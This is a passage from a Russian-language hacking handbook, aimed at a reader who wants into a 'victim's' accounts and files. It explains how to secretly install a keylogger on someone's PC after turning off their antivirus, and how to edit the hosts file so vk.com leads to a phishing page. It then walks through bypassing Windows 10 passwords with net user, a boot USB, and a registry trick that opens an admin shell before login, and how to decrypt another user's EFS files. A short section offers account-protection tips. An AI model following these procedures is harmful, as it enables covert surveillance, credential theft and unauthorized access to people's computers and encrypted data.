- Тебе нужен физический доступ к компьютеру жертвы, чтобы установить программу-шпион. Можно отправить его в письме – в виде ссылки или как вложение, но в 99% случаев антивирус (или почтовой системы, или установленный на компе жертвы) начнет бить тревогу. Все имеющиеся клавиатурные шпионы распознаются антивирусами как вирусы или шпионское ПО (spyware). Так что тебе на время установки придется выключить антивирус, а после установки шпиона – добавить его в исключение антивируса. На все про все уйдет минут 5, если ты все сделаешь быстро. Но эти 5 минут жертва должна отсутствовать за компом. Подойдет, только если есть личный доступ, например, это домашний комп или комп коллеги.
- Клавиатурные шпионы, кроме паролей, записывают в файл все, что вводит жертва. Порой это очень много текста, и ты можешь потратить день или даже больше, чтобы разобрать, что вводила жертва.
- Жертва может не вводить пароль вовсе. Он может быть сохранен в браузере. Поэтому ты можешь получить все, что вводила жертва, но кроме паролей! Заодно, конечно, прочитаешь текст всех отправленных жертвой сообщений, но цель не будет достигнута.

В общем, клавиатурный шпион – не лучшее решение для взлома странички в социальной сети, но как один из вариантов, его можно использовать.

## 8.3.6. Подмена DNS

Довольно непростой, с одной стороны, метод. Если ты настолько крут, что можешь на машрутизаторе развернуть собственный DNS-сервер, который бы перенаправлял запрос доменного имени vk.com (или любого другого) туда, куда тебе нужно (на твой фейковый сайт), то, мы считаем, что тебе не нужна эта книга!

Если ты не настолько крут, то открой файл hosts от имени администратора на компьютере жертвы. Он находится в папке C:\Windows\System32\drivers\ etc. Формат этого файла такой:

IP-адрес доменное\_имя

Запиши IP-адрес своего хостинга, на котором находится фейковая страница так:

IP-agpec vk.com

Сохрани файл и в командной строке введи команду:

ipconfig /flushdns

Когда жертва введет адрес vk.com, то попадет на твою фейковую страничку. Пароль ты получишь, но у этого способа есть недостатки. После такой подмены пользователь попадет на твою страничку, введет логин и пароль, ты их получишь, но больше пользователь не сможет попасть на ВКонтакте, поскольку каждый его запрос будет перенаправляться на твою страничку. Однозначно пользователь что-то заподозрит.

## 8.4. Как уберечься от взлома

А теперь поговорим о том, как уберечься от взлома странички в социальной сети, чтобы ты сам не попался на крючок хакера:

- Способ 1 самый простой не заводи страничек в социальных сетях.
   Если нужна информация, которую можно там найти, заведи несколько фейковых аккаунтов. Даже если их взломают, ты ничего не потеряешь.
- Способ 2 спасаемся от фишинга. Во-первых, старайся не переходить по ссылкам в почте от социальной сети. Всегда можно зайти на сайт или воспользоваться мобильной версией, чтобы посмотреть, кто тебе пишет. Когда же тебя просят ввести имя пользователя и пароль, обрати внимание на адрес сайта. Если он отличается от vk.com (ВКонтакте), facebook.com

(Facebook), my.mail.ru (Мой мир), ok.ru (Одноклассники) и другого привычного адреса, уйди с этой странички. Ну или можешь ввести выдуманный e-mail и выдуманный пароль – пусть хакер помучается!

- Способ 3 защита от физического доступа к компьютеру обязательно установи минимальную задержку на блокировку экрана (1-3 минуты), также установи пароль для своей учетной записи. Да, работать будет не столь удобно, но зато никто за считанные минуты, пока ты отлучишься, не сможет установить на твой комп ПО или внести изменения в конфигурацию системы.
- Способ 4 двухфакторная авторизация и внимательность залог успеха. Как в песне – "следи за собой, будь осторожен!" Двухфакторная авторизация не позволит хакеру сразу завладеть твоей страничкой, даже если он узнает логин и пароль. Ему понадобится еще и код для входа на страничку. А такой код он может только выманить у тебя. Если хакер кто-то из твоих близких, не исключено, что он может (пока ты отошел) завладеть твоим телефоном и прочитать на нем код в SMS. Поэтому не забывай о защите своих гаджетов. Хотя, если человек совсем близкий, то тебя не спасет даже отпечаток пальца – пока ты спишь, он сможет войти в твой телефон и провернуть все свои грязные делишки. Но таких лучше к себе не подпускать, особенно когда спишь.
- Просто совет используй разные адреса почты для переписки и для регистрации в социальной сети. Даже если кто-то завладеет твоим основным адресом (хотя даже не знаю, что хуже – потерять доступ к почте или к соцсети), то не сможет взломать через нее страничку в соцсети.

## Глава 9.

## Взлом паролей и получение доступа к зашифрованным данным

Парольная защита остается весьма актуальной даже в 2023 году. Да, есть всевозможные методы биометрической защиты (сканеры сетчатки глаза, лица (вроде FaceID на iOS), сканеры отпечатков пальцев), но все они менее распространены по сравнению с обычными паролями.

В этой главе будет рассмотрен не только <del>сброс</del> взлом пароля Windows 10/11, но и его логическое продолжение – получение доступа к зашифрованным данным (с обычными все просто и неинтересно) пользователя.

## 9.1. Сброс пароля Windows 10

Чтобы взломать защиту, необязательно быть хакером. Достаточно просто правильно восстановить компьютер. Итак, представим, что есть компьютер с Windows 10 (к 11 версии тоже подойдет). Это может быть домашний компьютер, за которым работаешь не только ты, но и твои близкие, или же рабочий комп. Рано или поздно наступает момент, когда кто-то забывает свой пароль (может быть, это даже ты сам!). Как не помочь человеку в этот трудный момент?

## 9.1.1. Сброс пароля с помощью PowerShell

Windows 10 позволяет одновременно входить в систему несколькими способами, например не только с паролем, но и с помощью отпечатка пальца, PIN-кода или распознавания лица. Если у тебя есть такая возможность, используй ее, а затем сбрось забытый пароль таким образом:

- 1. Нажмите Windows+X и выберите Windows Power Shell (Администратор).
- 2. Введите команду net user имя\_пользователя новый\_пароль
- 3. Забытый код доступа будет заменен новым.

**Примечание.** Данный способ работает только с локальными паролями, не Microsoft Live.

Некоторые читатели могут возразить – как же получить доступ к системе? На самом деле совет рассчитан на то, что ты будешь помогать другим пользователям восстановить свой пароль, а не подбирать его с нуля. А как же права админа? Чего там греха таить – посмотри список учеток твоего компа, – куда ни глянь – все админы. Так что таким образом могут подобрать и твой пароль, и об этом нужно помнить. Если ты главный пользователь, то не нужно создавать учетные записи с правами админа, иначе сначала "восстановят" твой пароль, а дальше – дело техники. Можно просмотреть, какие файлы ты открываешь, какие сайты смотришь (особенно если ты не выполнял рекомендаций из главы 5) и т.д.

## 9.1.2. Взлом пароля с помощью утилиты Lazesoft Recover My Password

А сейчас немного усложним задачу. Представим, что доступа к компу у нас нет и ни одного пароля мы не знаем, то есть вход в систему вообще запрещен (и как пользователю, и как админу).

Парольная защита в Windows 10 оставляет желать лучшего. Это подтверждается тем, как легко сторонние программы сбрасывают ее. Для примера возьмем утилиту Lazesoft Recover My Password.

- 1. Скачай и установи Lazesoft Recover My Password на другой компьютер, доступ к которому у тебя есть.
- 2. Открой программу и подключи к ПК флешку (система ее отформатирует, так что не оставляй на ней ничего важного).
- 3. Нажми кнопку Burn Bootable CD/USB Disk Now! и следуй инструкциям программы.
- 4. Вставь флешку в заблокированный компьютер и перезагрузите его.
- 5. Нажмите при запуске клавишу Del, F2, F8, F9, F11 или F12 (нужная обычно отображается на экране), открой BIOS и загрузи ПК с флешки — она будет называться Lazesoft Live CD (EMS Enabled). Если на вход в BIOS стоит пароль, выключи комп, открой корпус и вытащи батарейку примерно на 5 минут. Этого хватит, чтобы BIOS забыла все параметры, в

том числе и установленный пароль. С ноутбуками, правда, такой трюк не пройдет – их разобрать значительно сложнее.

- 6. Выбери вариант **Password Recovery** и следуй инструкциям программы.
- 7.

Примечание. Скачать программу можно по адресу https://www.lazesoft.com/ forgot-windows-admin-password-recovery-freeware.html и при этом совершенно бесплатно.

Учти: эта и подобные утилиты не сработают, если система установлена на зашифрованном с помощью встроенного инструмента BitLocker диске. С такого накопителя также нельзя извлечь данные. Впрочем, и для этого есть способ, о котором мы поговорим далее в этой главе.

## 9.1.3. Сброс пароля Windows 10 через режим восстановления

Этот способ сложноват, зато не требует дополнительных программ. Работает только с локальными учетными записями, не аккаунтами Windows Live.

Тебе понадобится диск или флешка с установочным образом Windows 10. О том, как ее сделать, написано здесь:

https://remontka.pro/rufus-3-bootable-usb/

Если вкратце, то скачай на торрентах или с официального сайта ISO-образ с Windows 10, а затем используй утилиту Rufus (https://rufus.ie/), чтобы создать загрузочный диск. Все это можно сделать на любом компе, к которому у тебя есть доступ. Даже не обязательно наличие Windows 10 – для создания загрузочного диска вполне хватит и компа с Windows 7. То есть подойдет любой, даже старенький комп.

Rufus 3.8.1580 (Portable)		- D	×
<b>Drive Properties</b>	1 m		
Device			
NO_LABEL (F:) [4GB]	1915	A BREAK	1
Boot selection			
en-ru_windows_10_version_	2004_w	ith_up ~ 🞯 🛛 s	ELECT
Image option			100
Standard Windows installat	tion	ALC: NOT A	
Partition scheme	5.1	Target system	
GPT	-	UEFI (non CSM)	
Use Rufus MBR with BIOS Format Options Volume label	S ID	0x80 (Default)	No. of the second second
en-ru_Win10Ver2004x64_u			-
File system	111	Cluster size	E. L. M.
FAT32	*	4096 bytes (Default	) ~
Y Show advanced format	options		
Status	100		
			1.
Rend Classificator	REAL	Y.	
© 0 = III		START	CLOSE
sector windows 10 version	2004	with update 19041 572	

Рис. 9.1. Утилита Rufus

Далее подойди к "целевому" компу и перезапусти, как было описано в предыдущем совете. Войди в BIOS, нажав Del, F2, F8, F9, F11 или F12. Выбери загрузку с флешки. Далее действуй в соответствии со следующей инструкцией:

- 1. Когда появится интерфейс установки Windows 10, нажми Shift + F10 или Shift + Fn + F10 на некоторых ноутбуках, если первая комбинация не сработает. Откроется командная строка.
- 2. Введи команду regedit и нажмите Enter. Запустится редактор реестра.
- 3. В открывшемся редакторе реестра выдели справа папку HKEY\_LOCAL\_ MACHINE. Затем выбери команду меню **Файл, Загрузить куст**.
- 4. Открой путь к файлу C:\Windows\System32\config\SYSTEM. В режиме восстановления могут путаться имена дисков, например, диск C отображается как E. Это нормально. Узнать, на каком диске у тебя папка Windows, можно, посмотрев их содержимое.
- 5. Система предложит ввести имя для куста реестра. Введи любое, чтобы не совпадало с существующими, например coolhacker, и нажми **OK**.
- 6. Открой папку HKEY\_LOCAL\_MACHINE на панели слева, в ней coolhacker, а в нем раздел Setup.
- 7. Найди параметр CmdLine, щелкни дважды и в поле **Значение** введи cmd. ехе, нажмите **OK**. Затем в другом параметре SetupType (он ниже) укажи значение 2 и опять нажми **OK**.
- 8. Выдели папку coolhacker на панели слева и выбери команду меню Файл, Выгрузить куст.
- Закрой все окна и перезагрузи комп. Вытащи флешку, чтобы он запустился как обычно.
- 10. При перезагрузке логотип системы не появится. Вместо этого откроется командная строка. Введи net user имя\_пользователя новый\_пароль, и пароль будет изменен на указанный тобой. Если нужно убрать пароль вовсе, используй команду net user имя\_пользователя "" (две кавычки без пробелов и других символов). Нажми Enter.
- 11.Введи команду regedit и откройте раздел HKEY\_LOCAL\_MACHINE/ System/Setup. В параметре CmdLine удалите cmd.exe, в параметре SetupType установите значение **0**.
- 12. Перезагрузи компьютер. Далее ты сможешь заходить в систему с новым паролем или вовсе без него.



Рис. 9.2. Командная строка при установке Windows 10

Bale Depare Bud Holpanne Capters Kennerner Marxiellen Marxielle	I Pedakmon precimpa		
Mark         Mark         Tur         Baseries           Mark         Constraint         Mark         Tur           Mark         Constraint         Mark         Tur	Файл Провко Вид Избранное	Cnpaara	
Verifications of the second se	Kownwomep		
	<ul> <li>Hikey_CLASSES_ROOT</li> <li>Hikey_CURRENT_USER</li> <li>Hikey_LOCAL_MACHINE</li> <li>Hikey_LOCAL_MACHINE</li> <li>Hikey_LOSRS</li> <li>Hikey_CURRENT_CONFIG</li> </ul>	Mar Tun Beseiner	

Рис. 9.3. Редактор реестра

Что произошло? Сначала мы заставили целевую систему вместо загрузки обычного интерфейса при запуске отображать командную строку. Поскольку ни один пользователь еще не вошел в систему, то командная строка уже открылась с правами админа. Все, что тебе остается, – это использовать команду *net user* для сброса пароля. На этом все!

Многие пользователи считают, что от взлома пароля поможет уберечься шифрование. В следующих двух разделах будет показано, как получить доступ к файлам, зашифрованным с помощью EFS и даже BitLocker. Теории будет много, но без нее ты не сможешь выполнить задуманное.

# 9.2. Получение доступа к файлам, зашифрованным с помощью EFS

## 9.2.1. Что такое EFS?

В Windows (начиная с Windows 2000 и кроме Home-выпусков) традиционно для организации прозрачного шифрования используется шифрованная файловая система – EFS (Encrypting File System). Прежде чем мы будем взламывать EFS, нужно поговорить о ее преимуществах и недостатках.

Файловая система EFS предназначена, чтобы один пользователь не мог получить доступ к файлам (зашифрованным) другого пользователя. Зачем нужно было создавать EFS, если NTFS поддерживает разграничение прав доступа? Хотя NTFS и является довольно безопасной файловой системой, но со временем появились различные утилиты (одной из первых была NTFSDOS, позволяющая читать файлы, находящиеся на NTFS-разделе, из DOS-окружения), игнорирующие права доступа NTFS. Появилась необходимость в дополнительной защите. Такой защитой должна была стать EFS.

Примечание. При желании можно обойти права доступа NTFS, загрузившись с загрузочного USB-диска с Linux. Linux также прекрасно читает NTFS, и ей плевать на установленные права доступа. Может, изменить файл не получится, но прочитать – легко.

По сути, EFS является надстройкой над NTFS. Файловая система EFS удобна тем, что входит в состав Windows и для шифрования файлов не нужно какое-либо дополнительное программное обеспечение – все необходимое уже есть в Windows. Для начала шифрования файлов также не нужно совершать какие-либо предварительные действия, поскольку при первом шифровании файла для пользователя автоматически создается сертификат шифрования и закрытый ключ.

Еще преимуществом EFS является то, что при перемещении файла из зашифрованной папки в любую другую он остается зашифрованным, а при копировании файла в зашифрованную папку он автоматически шифруется. Нет необходимости выполнять какие-либо дополнительные действия.

Такой подход, конечно же, очень удобен, и пользователю кажется, что от EFS одна только польза. Но это не так. При неблагоприятном стечении обстоятельств пользователь может вообще потерять доступ к зашифрованным файлам. Это может произойти в следующих случаях:

- Аппаратные проблемы, например, вышла из строя материнская плата, испорчен загрузчик, повреждены системные файлы из-за сбоя жесткого диска (bad sectors). В итоге жесткий диск можно подключить к другому компьютеру, чтобы скопировать с него файлы, но если они зашифрованы EFS, у тебя ничего не выйдет.
- Система переустановлена. Windows может быть переустановлена по самым разнообразным причинам. В этом случае доступ к зашифрованным данным, понятно, будет потерян.
- Удален профиль пользователя. Даже если создать пользователя с таким же именем, ему будет присвоен другой ID, и расшифровать данные все равно не получится.
- Системный администратор или сам пользователь сбросил пароль. После этого доступ к EFS-данным также будет потерян.
- Некорректный перенос пользователя в другой домен. Если перенос пользователя выполнен неграмотно, он не сможет получить доступ к своим зашифрованным файлам.

Когда пользователи (особенно начинающие) начинают использовать EFS, об этом мало кто задумывается. Но, с другой стороны, существует специальное программное обеспечение (и далее оно будет продемонстрировано в работе), позволяющее получить доступ к данным, даже если система была переустановлена и были потеряны некоторые ключи. И я даже не знаю, к преимуществам или недостаткам отнести сей факт – данное ПО позволяет восстановить доступ к данным, но в то же время оно может использоваться злоумышленником для получения несанкционированного доступа к зашифрованным файлам.

Казалось бы, данные с помощью EFS зашифрованы очень надежно. Ведь файлы на диске шифруются с помощью ключа FEK (File Encryption Key), который хранится в атрибутах файлов. Сам FEK зашифрован master-ключом, который, в свою очередь, зашифрован ключами пользователей системы, имеющих доступ к этому файлу. Ключи пользователей зашифрованы хешами паролей этих пользователей, а хеши паролей – зашифрованы еще и SYSKEY.

Такая цепочка шифрования должна была обеспечить надежную защиту данных, но все банально сводится к логину и паролю. Стоит пользователю сбросить пароль или переустановить систему, получить доступ к зашифрованным данным уже не получится. Разработчики EFS перестраховались и реализовали агентов восстановления (EFS Recovery Agent), то есть пользователей, которые могут расшифровать данные, зашифрованные другими пользователями. Однако использовать концепцию EFS RA не очень удобно и даже сложно, особенно для начинающих пользователей. В итоге, эти самые начинающие пользователи знают, как зашифровать с помощью EFS файлы, но не знают, что делать в нештатной ситуации. Хорошо, что есть специальное ПО, которое может помочь в этой ситуации, но это же ПО может использоваться и для несанкционированного доступа к данным, как уже отмечалось.

К недостаткам EFS можно также отнести невозможность сетевого шифрования (если оно вам нужно, то необходимо использовать другие протоколы шифрования передаваемых по сети данных, например, IPSec) и отсутствие поддержки других файловых систем. Если пользователь скопирует зашифрованный файл на файловую систему, которая не поддерживает шифрование, например на FAT/FAT32, файл будет дешифрован и его можно будет просмотреть всем желающим. Ничего удивительного в этом нет, EFS – всего лишь надстройка над NTFS.

Получается, что от EFS вреда больше, чем пользы. Но, чтобы не быть голословным, далее будет приведен пример использования программы Advanced EFS Data Recovery<sup>1</sup> для получения доступа к зашифрованным данным. Сценарий будет самый простой: сначала мы войдем в систему под другим пользователем и попытаемся получить доступ к зашифрованному файлу, который зашифровал другой пользователь. Затем будет смоделирована реальная ситуация, когда сертификат пользователя, зашифровавшего файл, был удален (это может произойти, например, в случае переустановки Windows). Как будет показано, программа без особых проблем справится и с этой ситуацией. Но сначала нам нужно разобраться, как включить EFS-шифрование.

## 9.2.2. Включение EFS-шифрование

Процесс включения шифрования показан на рис. 9.4. Для его демонстрации мы создали папку C:\Files. Далее нужно щелкнуть правой кнопкой мыши на этой папке, выбрать команду Свойства, в появившемся окне нажать кнопку Другие и в окне Дополнительные атрибуты включить атрибут Шифровать содержимое для защиты данных. Можно также выключить параметр Разрешить индексировать содержимое файлов в этой папке в дополнение к свойствам файла – незачем индексировать содержимое секретных данных.

http://www.elcomsoft.ru/aefsdr.html

1



Рис. 9.4. Включение EFS

## 9.2.3. Использование программы Advanced EFS Data Recovery для расшифровки зашифрованных EFS файлов

Посмотрим, как можно расшифровать зашифрованные с помощью EFS файлы. Первым делом нужно включить шифрование для одной из папок. Для демонстрации была специально создана папка Files в предыдущем разделе.

В зашифрованную папку был добавлен текстовый файл "пароли" (рис. 9.5), содержимое которого мы попытаемся просмотреть, войдя в систему под другим пользователем. Для теста был создан другой пользователь с правами администратора (такие права нужны программе Advanced EFS Data Recovery (AEFSDR) компании ElcomSoft), смотри рис. 9.6.

· · · · · · · · · · · · ·	от компьютер ,> Windows 10 (C) > Files	×	O FIGUCE Flies		, p
	Visal	Дата изменения	Turn	Размер	
ж Быстрый доступ	Пароли	05.12.2020 8:08	Текстовия докум	1.	K6
K Jarmonos d					20
Документы *			1.1.1.1.1.1.1		
изображения я					
Видео					
Э Музыка					
Этот компьютер				Same St.	
🐠 Сеть	a attended for the				
	le la Presidente				
	NATERIA STAR	明天の夏		$\frac{p}{p_{1},s_{1}}$	
	Martin Carlos and States				
annun Bertalen tas					Taxia)

тная запись Майкрософт	
Создать учётную запись для данного к	омпьютера
Если вы хотите использовать пароль - выберите что-то, что в будет сложно утадать.	вам запомнится легко, а другим
Кто будет использовать данный компьютер?	
Hacker	일 같은 것 같은 것 같은 것 같이 없다.
Обеспечьте безопасность.	
•••	
•••	
В случае, если вы забыли свой пароль	
Контрольный вопрос 1 🗸 🗸 🗸	
Ответ	
Lease and the second se	and the second
	Далее Назад

Рис. 9.6. Создан новый пользователь

Естественно, если зайти под другим пользователем и попытаться прочитать файл "пароли", у вас ничего не выйдет (рис. 9.7).

файн Превка формат Вид Спр	and a second second measurement of a second s	
	•	
	Encover X           Encover         X           Collect-sepons.vt.         Seponsery separameters are compared with a comparison set as assessment press.	

Рис. 9.7. Отказано в доступе

Но не беда – запускаем программу Advanced EFS Data Recovery и переходим сразу в **Expert mode** (можно, конечно, воспользоваться мастером, который открывается при первом запуске (рис. 9.8), но мне больше нравится экспертный режим).



Рис. 9.8. Macmep npu запуске Advanced EFS Data Recovery

S related files Encrypted files	s Fileboe					
FileName/UserName	Size	Туре	Comments	71	1	Scan for keys
	-	Sec. 17			- Yeard	Add user password
	1	7201	1 1 1			Add passwords from gictionary
				- finite		Add SYSKEY_
				1-1-		Add Certificate
						A CARE A
					1	Biftsup data
				and with		Bestore data

Рис. 9.9. Экспертный режим Advanced EFS Data Recovery

Итак, перейди на вкладку Encrypted files и нажми кнопку Scan for encrypted files. Сначала программа предложит найти ключи. После того, как ключи будут найдены, снова нажми кнопку Scan for encrypted files непосредственно для поиска зашифрованных файлов.

На рис. 9.10 уже изображен результат сканирования – найден наш единственный зашифрованный файл C:\Files\пароли.txt. Выдели его и нажми кнопку **Decrypt**. Программа предложит выбрать каталог, в который нужно дешифровать файлы (рис. 9.11).

S relate	d files Encrypted files File tree	
FileNar	ne Size Modification dat Users irea/mponesise 48 12/05/2020 08 03 WIN-AGDR2E0	Scan for encrypted files
		Decrypt.
	Scanning logical disk C: ×	1.000
	Progrem is scanning logical disk to find encrypted files. This may take several minutes to complete.	
	Files scenned: 283.279 Encrypted files found: 1 Time elepsed: 1 min 59 sec	A. Berger
	96% .	Ramove from Lat
	96%	Selectat
	Cancei	Service bighlighted
	In the second se	Unicolocitan
		The Statures Solering

Рис. 9.10. Найдены зашифрованные файлы

) In Ceth	
> 🦷 Библиотеки	
> 🤙 Этот компьютер	
> 🖁 Hacker	
> 🌰 OneDrive	

Рис. 9.11. Выбери каталог, в который будут дешифрованы файлы

Поскольку мы использовали пробную версию программы, то для продолжения нужно нажать **Continue** (рис. 9.12). Расшифрованные файлы помещаются в подпапку AEFS\_<имя\_диска>\_DECRYPTED (рис. 9.13).

Теперь усложним задачу программе Advanced EFS Data Recovery, а именно – удалим личный сертификат. Войди как пользователь, создавший зашифрованную папку, запустите консоль **mmc** и открой список личных сертификатов (нужно выбрать команду **Файл**, **Добавить или удалить оснастку** и добавить оснастку **Сертификаты**).



Рис. 9.12. Нажми кнопку "Continue"

12 (19) (14 (1) (19) (10)	рано Главная Поделиться Вид		0
Sirelated files Encrypted files E	← · · · · · · · · · · · · · · · · · · ·	> Files V Donoc Files	p
Fieldsme CyFley/neponetd	имя В Быстрый доступ в Рабоший стол	Дата изменения Тип, Размер 05.12.000.608, Текстовний докум	IXE
	а Загрузки А В Документы А Изображения К		
	👹 Видео Ца Музыка	Rappar - Stopper	×
Star Star	ић ОсеОние Эн Этот компьютер	Файл Прэвка Формат Вид Справка пароль от почты dht&7389 Банкинг Рь7388 дест	·····
1	et Cens	and the second second	and and a
the second states where the second states are been as		Contraction of the second s	
Decryptable (1)			

Рис. 9.13. Расшифрованный файл и содержимое файла "пароли.txt"

Удали свой личный сертификат. Ты увидишь предупреждение о том, что расшифровать данные, зашифрованные с помощью этого сертификата, будет уже невозможно. Что ж, скоро мы это проверим.

Далее выполни следующие действия:

- Закрой оснастку и попробуй обратиться к зашифрованному файлу. У тебя ничего не получится, несмотря на то, что ты недавно лично зашифровал этот файл. Сертификата ведь нет.
- Смени пользователя, запусти программу Advanced EFS Data Recovery. Попробуй расшифровать файл, как было показано ранее. Сначала программа сообщит, что сертификат не найден. Поэтому нужно перейти на вкладку EFS related files и нажать кнопку Scan for keys. Через некоторое

время программа сообщит, что нашла ключи, но, вероятно, не все (рис. 9.15). Программа рекомендует просканировать ключи еще раз, но на этот раз с включенной опцией Scan by sectors (рис. 9.16), но этого можно не делать и сразу перейти на вкладку Encrypted files. Программа успешно нашла и дешифровала файл.



Рис. 9.14. Консоль ттс: удаление сертификата для "Шифрующей файловой системы"

**Примечание**. Нужно отметить, что в посекторном режиме (при включенной опции **Scan by sectors**) сканирование занимает заметно больше времени.

related files. Encounted files. File tran	10000			
with the set of the set	14 1 × 1	de anticipation de la		
ileName/UserName	Size	Туре	Comments	Scan for keys.
adda14023tae /dttba/ee22861996a4_fc9c2cdb-a2	2.253	Private Key	And a company	the state of the state
0x0406a ce09 404 ac55 7x2e978cc253	466	Master Key	Windows 7	Add user password.
darbh1d-87d6-87aa-b57a-7d4e 32c06750	400	Missier Key	Windows 7	Add passwords from dictionary
1500441 cb02-4900-b537 509c an Warning	-	the state of the s	×	
d56490c-daaa-43c8-bbd2-2262	the state	Contraction of the	ANT CLOSED AT A	ALLOYOUEV
ba61ao1-6bdd-4ee6-814d-Md3	Augeraker			
S619ac0 4e85 4e9 a3d0 679e1 recommend you t	Add Certificate			
51507b0-1270-4b39-9634-4a39d "Scan by sectors" deleted keys, and				
Idoc5b73-1217-4663-b35a-4608 reformatted the o				
d943301=7016-475e-964c-0562t	1	ОК	ALC: CONTRACTOR	141 -
Hidilizan R47n da160ma Sc1b2d		- N	ALL PROPERTY.	
216b1ab 600 454b 874c c3b13				
SYSTEM	13.107.2	SYSTEM Re	SYSKEY is stored i.	
SAM .	65.536	SAM Registry		
			in the second se	
the state of the state of the				and the second second second
and the second		in		Dackup data.,
The Contract of the State of th	WHO READER	CONTRACTOR NO.	Contraction of	Restore data

Рис. 9.15. Найдены не все ключи

Letter	Filesystem	Size (Mb)		Start Scan
]0	CDFS	S GB	F jarre -	Scan by sectors
	2 1 1/2			Select gil
14-11-14-14				Unselect all
-	1			÷19
				Cancel

**Рис. 9.16. Включение опции** "Scan by sectors"

S related files Encrypted files File tree							
leName C:\Files\naponik.txt	Size 1 43	Addification dat 12/05/2020 08:08	Users WIN-AGDR2FQ		Scen for encrypted files_		
				eter is here	Decrypt.		
	- Ander		2.3.3.1				
-	1000		5-6				
	1						
				1-2 1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-	Sector Sector		
-					Selectal		
and government	il	-			Select highlighted		
AL				125.25	Unselect all		

Рис. 9.17. Программа может расшифровать файл, даже если сертификат был удален

К стыду EFS или к чести Advanced EFS Data Recovery, в обоих случаях файл был расшифрован. При этом нам не понадобились какие-то специальные знания или навыки. Достаточно запустить программу, которая сделает за хакера всю работу. О том, как работает программа, можно прочитать на сайте разработчиков<sup>2</sup>.

## 9.3. Восстановление доступа к BitLocker

Как обычно, прежде чем научиться взламывать BitLocker, нужно понимать, как он работает и вообще что собой представляет.

http://www.elcomsoft.ru/

2
## 9.3.1. Особенности реализации

BitLocker – это более надежная технология шифрования диска, интегрированная в операционные системы, начиная с Windows Vista.

С помощью **BitLocker** пользователь может зашифровать раздел диска (в том числе системный, что не всегда умеет стороннее ПО), весь диск, съемный диск (например, флешку).

Технология BitLocker стала ответом Microsoft на возрастающее число офлайновых атак, которые в отношении компьютеров с Windows выполнялись особенно просто. Любой человек с загрузочной флешкой может почувствовать себя хакером. Он просто выключит ближайший компьютер, а потом загрузит его снова — уже со своей ОС и портативным набором утилит для поиска паролей (о чем мы упоминали ранее), конфиденциальных данных и препарирования системы. При этом ему не нужно вводить какие-либо пароли к учетной записи, он просто запустит свою операционную систему и прочитает данные. При желании в конце рабочего дня можно извлечь вообще жесткий диск, скопировать с него всю информацию, а после этого вернуть все как было. И пользователь даже не узнает, что кто-то "слил" с его компьютера все файлы.

Технология BitLocker позволяет посекторно зашифровать данные на диске. Даже если кто-то загрузится со своей операционной системой или же извлечет диск из компьютера, прочитать он ничего не сможет, так как данные зашифрованы.

BitLocker позволяет работать с зашифрованным диском так же, как и с любым другим, только нужно будет сначала ввести пароль для доступа к диску. Также может наблюдаться снижение производительности на 10-20%, но эффект будет заметен только на слабых компьютерах. Вообще, пользователь может и не заметить снижение производительности, все зависит от того, какие данные хранятся на диске. Если был зашифрован, скажем, диск D:, на котором хранятся и данные, и программы, то снижение производительности будет заметно, особенно при запуске программ (это мы уже молчим про шифрование системного диска C:).

Если же на диске D: хранятся только документы, а программы – на диске C:, то пользователь не должен почувствовать какого-либо снижения производительности при работе с зашифрованным диском.

В плане восстановления доступа BitLocker гораздо удобнее, чем EFS. Хотя EFS и предлагает концепцию агентов восстановления, сама процедура вос-

становления довольно сложная, и не все начинающие пользователи могут с нею справиться. Выходит так, что вход в EFS стоит рубль, а выход – 10. Пользователи могут быстро и просто зашифровать данные, но что делать для их расшифровки в случае нештатной ситуации – знают немногие.

В случае с BitLocker все гораздо проще. При шифровании диска пользователь указывает пароль, а BitLocker генерирует ключ восстановления, который можно легко использовать для восстановления доступа в случае, если пароль был забыт.

Ключ восстановления можно хранить на компьютере, в чипе TPM (если такая возможность поддерживается компьютером) и в учетной записи Майкрософт (настоятельно не рекомендуется, поскольку этим, по сути, предоставляется доступ к секретным данным Майкрософту).

Криптоконтейнеры BitLocker сами по себе достаточно надежны. Если тебе принесут неизвестно откуда взявшуюся флешку, зашифрованную BitLocker, то вряд ли получится расшифровать ее за приемлемое время. Может, и выйдет, но к тому времени ты состаришься, а информация потеряет всякую актуальность.

Самое опасное – это ключ восстановления. Часто пользователи шифруют диск, но не уделяют никакого внимания безопасному хранению ключей восстановления. Хакер может извлечь жесткий диск или загрузиться с загрузочной флешки. Он произведет поиск файлов по имени "Ключ восстановления\*" и/или по содержимому "Ключ восстановления". Он найдет ключ восстановления, а дальше – дело техники.

Казалось бы, к BitLocker претензий нет, это человеческий фактор. Но, по сути, пользователя не должно волновать, как были расшифрованы ваши данные – или путем поиска уязвимости в самом BitLocker, или же потому, что он плохо защитил ключ восстановления. Главное то, что кто-то смог получить доступ к секретной информации, и это самое плохое.

Именно на этом факте и будет основываться наша дальнейшая стратегия – на поиске ключа восстановления, который наверняка находится на том же компьютере, что и зашифрованный диск.

## 9.3.2. Технические подробности

При первой активации BitLocker приходится долго ждать. Это вполне объяснимо — процесс посекторного шифрования может занять несколько часов, ведь прочитать все блоки терабайтных HDD быстрее не удается.

Но отключение BitLocker происходит практически мгновенно — как же так?

Дело в том, что при отключении BitLocker не выполняет расшифровку данных. Все секторы так и останутся зашифрованными ключом FVEK. Просто доступ к этому ключу больше никак не будет ограничиваться. Все проверки отключатся, а VMK останется записанным среди метаданных в открытом виде. При каждом включении компьютера загрузчик ОС будет считывать VMK (уже без проверки TPM, запроса ключа на флешке или пароля), автоматически расшифровывать им FVEK, а затем и все файлы по мере обращения к ним. Для пользователя все будет выглядеть как полное отсутствие шифрования, но самые внимательные могут заметить незначительное снижение быстродействия. Точнее — отсутствие прибавки в скорости после отключения шифрования.

Интересно в этой схеме и другое. Несмотря на название (технология полнодискового шифрования), часть данных при использовании BitLocker все равно остается незашифрованной. В открытом виде остаются MBR и BS (если только диск не был проинициализирован в GPT), поврежденные секторы и метаданные. Открытый загрузчик дает простор фантазии. В псевдосбойных секторах удобно прятать руткиты и прочие вредоносные программы, а метаданные содержат много всего интересного, в том числе копии ключей. Если BitLocker активен, то они будут зашифрованы (но слабее, чем FVEK шифрует содержимое секторов), а если деактивирован, то просто будут лежать в открытом виде. Это все потенциальные векторы атаки. Потенциальные они потому, что, помимо них, есть куда более простые и универсальные – тот же поиск ключа восстановления, о чем уже было сказано.

Далее будет показано, как включить BitLocker и как восстановить доступ к зашифрованному диску, если вы забыли пароль. Мы будем шифровать диск Е:, на который потом поместим все секретные документы. Если у вас только один диск, то вы можете разделить его на разделы программой AOMEI Partition Assistant или любой другой подобной.

